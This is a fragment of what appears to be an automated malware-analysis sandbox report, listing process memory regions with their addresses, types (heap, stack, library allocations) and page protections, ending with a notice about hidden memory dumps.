|
page read and write
|
||
|
7FFD9BD95000
|
trusted library allocation
|
page read and write
|
||
|
1AAE000
|
stack
|
page read and write
|
||
|
1CC6B8C6000
|
heap
|
page read and write
|
||
|
2BC7A6B0000
|
trusted library allocation
|
page read and write
|
||
|
20086000
|
heap
|
page read and write
|
||
|
1CC6B8E7000
|
heap
|
page read and write
|
||
|
7FFD9BE1B000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8BD000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
2BC7A8F8000
|
heap
|
page read and write
|
||
|
2BC7A8D8000
|
heap
|
page read and write
|
||
|
2BC7A8D0000
|
heap
|
page read and write
|
||
|
EFD4F8E000
|
stack
|
page read and write
|
||
|
1D110000
|
heap
|
page read and write
|
||
|
2BC7A762000
|
heap
|
page read and write
|
||
|
1BD30000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
2BC7AE47000
|
heap
|
page read and write
|
||
|
1FB78000
|
stack
|
page read and write
|
||
|
7FFD9B840000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA94000
|
trusted library allocation
|
page read and write
|
||
|
20200000
|
heap
|
page execute and read and write
|
||
|
7FFD9B7E0000
|
trusted library allocation
|
page read and write
|
||
|
3FCC000
|
trusted library allocation
|
page read and write
|
||
|
9F5000
|
heap
|
page read and write
|
||
|
1CC6B8BD000
|
heap
|
page read and write
|
||
|
880000
|
unkown
|
page readonly
|
||
|
200D6000
|
heap
|
page read and write
|
||
|
1CC6B8BF000
|
heap
|
page read and write
|
||
|
4B85000
|
trusted library allocation
|
page read and write
|
||
|
1CC6B8BF000
|
heap
|
page read and write
|
||
|
7FFD9BE20000
|
trusted library allocation
|
page read and write
|
||
|
7FF483270000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BFA9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B650000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BFB0000
|
trusted library allocation
|
page read and write
|
||
|
20128000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BCF5000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B928000
|
trusted library allocation
|
page read and write
|
||
|
200F9000
|
heap
|
page read and write
|
||
|
2BC7AE44000
|
heap
|
page read and write
|
There are 406 hidden memdumps, click here to show them.